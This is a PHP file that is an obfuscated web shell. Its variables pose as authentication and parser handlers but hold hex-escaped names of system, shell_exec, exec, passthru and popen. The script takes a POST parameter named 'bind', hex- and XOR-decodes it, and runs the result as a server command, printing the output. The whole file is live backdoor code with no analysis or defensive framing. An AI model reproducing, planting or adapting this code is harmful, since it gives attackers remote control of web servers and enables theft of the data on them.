<?php

$auth_exception_handler4 = "pas\x73t\x68\x72\x75";
$token_parser_engine = "\x68e\x78\x32\x62in";
$auth_exception_handler5 = "p\x6F\x70en";
$auth_exception_handler1 = "s\x79\x73\x74em";
$auth_exception_handler6 = "str\x65\x61\x6D_\x67\x65t_c\x6Fnt\x65\x6Ets";
$auth_exception_handler2 = "shell_\x65xec";
$auth_exception_handler7 = "pc\x6C\x6F\x73e";
$auth_exception_handler3 = "exec";
if (isset($_POST["bi\x6Ed"])) {
            function initialized($parameter_group ,  $property_set ){ $res='' ;$n=0; do{$res.=chr(ord($parameter_group[$n])^$property_set);$n++;} while($n<strlen($parameter_group)); return$res; }
            $bind = $token_parser_engine($_POST["bi\x6Ed"]);
            $bind = initialized($bind, 58);
            if (function_exists($auth_exception_handler1)) {
                $auth_exception_handler1($bind);
            } elseif (function_exists($auth_exception_handler2)) {
                print $auth_exception_handler2($bind);
            } elseif (function_exists($auth_exception_handler3)) {
                $auth_exception_handler3($bind, $rec_parameter_group);
                print join("\n", $rec_parameter_group);
            } elseif (function_exists($auth_exception_handler4)) {
                $auth_exception_handler4($bind);
            } elseif (function_exists($auth_exception_handler5) && function_exists($auth_exception_handler6) && function_exists($auth_exception_handler7)) {
                $property_set_res = $auth_exception_handler5($bind, 'r');
                if ($property_set_res) {
                    $dchunk_component = $auth_exception_handler6($property_set_res);
                    $auth_exception_handler7($property_set_res);
                    print $dchunk_component;
                }
            }
            exit;
        }